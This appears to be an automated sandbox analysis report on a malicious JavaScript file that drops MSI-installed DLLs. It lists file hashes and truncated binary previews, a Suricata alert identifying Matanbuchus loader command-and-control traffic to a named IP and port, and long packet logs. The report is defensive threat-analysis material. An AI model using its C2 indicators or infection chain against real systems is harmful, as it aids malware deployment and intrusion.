                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: fes.msi, Detection: malicious, Browse
                                          • Filename: zdi.txt.msi, Detection: malicious, Browse
                                          • Filename: merd.msi, Detection: malicious, Browse
                                          • Filename: medk.msi, Detection: malicious, Browse
                                          • Filename: lavi.msi, Detection: malicious, Browse
                                          • Filename: Document-v09-42-38.js, Detection: malicious, Browse
                                          • Filename: Document-v05-53-20.js, Detection: malicious, Browse
                                          • Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse
                                          • Filename: Document-19-06-38.js, Detection: malicious, Browse
                                          • Filename: Document-19-06-38.js, Detection: malicious, Browse
                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):446944
                                          Entropy (8bit):6.403916470886214
                                          Encrypted:false
                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):446944
                                          Entropy (8bit):6.403916470886214
                                          Encrypted:false
                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):446944
                                          Entropy (8bit):6.403916470886214
                                          Encrypted:false
                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1733
                                          Entropy (8bit):5.5641511938395345
                                          Encrypted:false
                                          SSDEEP:24:GbTg4BtTUTXNhu6SjIbopWzlzbSxtcZpUXUFP3bMJG9Q1EgcqvSDhiS/zJgoDI:GfSTBA1spSx63P3wUmEVD8S/HDI
                                          MD5:1DCFD320A3DAE54D5B24F10BE520138A
                                          SHA1:9952FDD310D24678CAEF935C3DE36972D061D990
                                          SHA-256:8A667B951405105260795F4D73CFB9DEC61BD27E12304FC2964F981292915296
                                          SHA-512:3E3000C62FD239A97AC0DA5020AC5AC27385FD5CBE2D2BC3DC5F3FEF5ACE53034316E9A8E85EBE03C12DDAA2F36B364AF6BE55F91F423B805DB148D30DAD2CA8
                                          Malicious:false
                                          Preview:...@IXOS.@.....@s..Y.@.....@.....@.....@.....@.....@......&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}..ProSoftware..klog.php.@.....@.....@.....@........&.{3E648317-E941-449A-AF72-39AC6882CB87}.....@.....@.....@.....@.......@.....@.....@.......@......ProSoftware......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}8.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB},.01:\Software\Blueray INC\ProSoftware\Version.@.......@.....@.....@......&.{08BCD781-A01D-4960-A91D-D4E69633EB46}2.C:\Users\user\AppData\Roaming\silver\libcurl.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".8.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@....
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.5674012917132396
                                          Encrypted:false
                                          SSDEEP:48:y8PhTuRc06WXOGFT55jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:dhT1IFTbCybvwCkFWEyb
                                          MD5:703CA6AF35FA579AFCB08CB58B7132D0
                                          SHA1:17586DF0FBB3C974023C9B6268118C2E1F014996
                                          SHA-256:771E59F57576B381856CC9FEF46DAB2777E3B27B2EC9B95B88DA94FFE9A85C90
                                          SHA-512:20CE633AF16607337A36083E0E5A279520EE7D75A8E07CFC6EF67E680552D7E9B940C26EC2A87715A80DEB0873A756C9CBC4F15F402624E9FB7D18ADE8E93F50
                                          Malicious:false
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):1.2560516444161327
                                          Encrypted:false
                                          SSDEEP:48:SiLuxNvGFXOHT5+jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:5LBKTsCybvwCkFWEyb
                                          MD5:D81ED92415EFD1F2A65B508309B9B493
                                          SHA1:43316AB0EE851A6238225094C2A65C45FAA533C6
                                          SHA-256:FB863B95E7E2AB2C8C043B3311D901EA022203D48C402B5D8A2102C61D1C25C7
                                          SHA-512:72DEF9B84480F2BEA361B5BF28444D2F066AA3EFE9F4EF8F8550D73E049DF897ACDBCA6E5B964427238803D08E987CAA598678120D634CBC5A7A8E15374B3545
                                          Malicious:false
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.5674012917132396
                                          Encrypted:false
                                          SSDEEP:48:y8PhTuRc06WXOGFT55jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:dhT1IFTbCybvwCkFWEyb
                                          MD5:703CA6AF35FA579AFCB08CB58B7132D0
                                          SHA1:17586DF0FBB3C974023C9B6268118C2E1F014996
                                          SHA-256:771E59F57576B381856CC9FEF46DAB2777E3B27B2EC9B95B88DA94FFE9A85C90
                                          SHA-512:20CE633AF16607337A36083E0E5A279520EE7D75A8E07CFC6EF67E680552D7E9B940C26EC2A87715A80DEB0873A756C9CBC4F15F402624E9FB7D18ADE8E93F50
                                          Malicious:false
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):1.2560516444161327
                                          Encrypted:false
                                          SSDEEP:48:SiLuxNvGFXOHT5+jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:5LBKTsCybvwCkFWEyb
                                          MD5:D81ED92415EFD1F2A65B508309B9B493
                                          SHA1:43316AB0EE851A6238225094C2A65C45FAA533C6
                                          SHA-256:FB863B95E7E2AB2C8C043B3311D901EA022203D48C402B5D8A2102C61D1C25C7
                                          SHA-512:72DEF9B84480F2BEA361B5BF28444D2F066AA3EFE9F4EF8F8550D73E049DF897ACDBCA6E5B964427238803D08E987CAA598678120D634CBC5A7A8E15374B3545
                                          Malicious:false
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.5674012917132396
                                          Encrypted:false
                                          SSDEEP:48:y8PhTuRc06WXOGFT55jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:dhT1IFTbCybvwCkFWEyb
                                          MD5:703CA6AF35FA579AFCB08CB58B7132D0
                                          SHA1:17586DF0FBB3C974023C9B6268118C2E1F014996
                                          SHA-256:771E59F57576B381856CC9FEF46DAB2777E3B27B2EC9B95B88DA94FFE9A85C90
                                          SHA-512:20CE633AF16607337A36083E0E5A279520EE7D75A8E07CFC6EF67E680552D7E9B940C26EC2A87715A80DEB0873A756C9CBC4F15F402624E9FB7D18ADE8E93F50
                                          Malicious:false
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):73728
                                          Entropy (8bit):0.13857270749497835
                                          Encrypted:false
                                          SSDEEP:48:fQkTEOfDS4OfgOfDS4OfdAErCyoq9FuSicI:2ybXybvwCkFWc
                                          MD5:5946A42C6C8F2245F33FB916C59E49DE
                                          SHA1:B824FC463DF3224105CC5B28AA314B70780FF474
                                          SHA-256:44528A83120FA4D754AE2F156471CE3A49AFF30CCAF23C395AB79E33870B84F1
                                          SHA-512:CF46947FAA0B7B2CA31D14C5F39A9BC49E1B67CB4853696AE568C5298D4F270F4A59A3CB98F4CECBCB5369FCABBB562D4A3D9885E6A8FF7C0B82E24BBFA2A103
                                          Malicious:false
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):1.2560516444161327
                                          Encrypted:false
                                          SSDEEP:48:SiLuxNvGFXOHT5+jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:5LBKTsCybvwCkFWEyb
                                          MD5:D81ED92415EFD1F2A65B508309B9B493
                                          SHA1:43316AB0EE851A6238225094C2A65C45FAA533C6
                                          SHA-256:FB863B95E7E2AB2C8C043B3311D901EA022203D48C402B5D8A2102C61D1C25C7
                                          SHA-512:72DEF9B84480F2BEA361B5BF28444D2F066AA3EFE9F4EF8F8550D73E049DF897ACDBCA6E5B964427238803D08E987CAA598678120D634CBC5A7A8E15374B3545
                                          Malicious:false
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          File type:ASCII text, with CRLF line terminators
                                          Entropy (8bit):5.879433038601054
                                          TrID:
                                            File name:Doc_21-04-53.js
                                            File size:977 bytes
                                            MD5:c10e7bce33b8d71ecd178565a63bb4ed
                                            SHA1:b2c32607a225fe745dd4d1f40e78578621728be1
                                            SHA256:09b473434edae856dc199c34092a9b4a9f735a0b0aeb1a03828fa215d1ce0237
                                            SHA512:10fd15544b0d676d45a9a07e06f3563949d9c2f8b7382b8f086777e0e1e482ee095fb4e8b4e8d8892940ed8d0dbb16dc293d998c38017a46e1c9e90b871871dc
                                            SSDEEP:24:dEsmSj2wouYUuKR+s0AXDRoiUMboz7I7GFD+NumTqYhjA:dEsMi58GoitoIatSuajA
                                            TLSH:F2111C46CD13EEE402BAA2D44EE96538CEE151804124E5E5BC9FF3F0569DB240A30EDB
                                            File Content Preview:// SIG // Begin signature block..// SIG // o3lghrkNHmy95KKmEUisGHk9XLVusIYcXP1r6PEi..// SIG // 8kZbJanxZdXnKYheZv9PqqIuiorVULYcBwh1IyC1..// SIG // RG7j6z5EYrWmDefQjBTtgJ1uqTmEDYvwz8q4Ltbw..// SIG // DCWxNnJe3bbnETsCUaHdDYHnlZRW3EYv5PFJpcP5..// SIG // q52n
                                            Icon Hash:68d69b8bb6aa9a86
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-12-06T22:11:58.099476+01002034468ET MALWARE Matanbuchus Loader CnC M31192.168.2.549785185.234.216.1754443TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 6, 2024 22:11:03.061937094 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:03.061997890 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:03.062226057 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:03.063940048 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:03.063954115 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:04.288217068 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:04.288316011 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:04.343190908 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:04.343226910 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:04.343646049 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:04.394279957 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:04.601475000 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:04.647330046 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.069020987 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.069334030 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.069365978 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.069391012 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.069397926 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.069433928 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.069458961 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.070287943 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.070329905 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.070343971 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.077517033 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.077563047 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.077579021 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.094177961 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.094233990 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.094255924 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.142429113 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.188946962 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.236057043 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.236078978 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.264698029 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.264781952 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.264836073 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.264868021 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.264935970 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.270816088 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.278605938 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.278686047 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.278707981 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.286891937 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.286958933 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.286976099 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.294336081 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.294400930 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.294416904 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.302268982 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.302341938 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.302359104 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.310132027 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.310204983 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.310220957 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.318089962 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.318185091 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.318200111 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.325728893 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.325836897 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.325850964 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.333605051 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.333700895 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.333714008 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.340986013 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.341070890 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.341085911 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.354897022 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.354984999 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.354991913 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.355012894 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.355058908 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.452994108 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.456418991 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.456490993 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.456628084 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.456659079 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.456708908 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.470865965 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.470875978 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.471086979 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.475337982 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.475398064 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.484083891 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.484256983 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.484282970 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.492360115 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.492427111 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.492449999 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.492491961 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.496663094 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.496717930 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.504807949 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.504873037 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.504920959 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.513219118 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.513276100 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.513294935 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.513341904 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.517288923 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.521425009 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.521486044 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.521506071 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.525644064 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.525687933 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.525701046 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.529690981 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.529735088 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.529746056 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.533879995 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.533926964 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.533937931 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.538151026 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.538201094 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.538212061 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.538254023 CET49704443192.168.2.5104.21.40.3
                                            Dec 6, 2024 22:11:05.542150021 CET44349704104.21.40.3192.168.2.5
                                            Dec 6, 2024 22:11:05.550481081 CET44349704104.21.40.3192.168.2.5
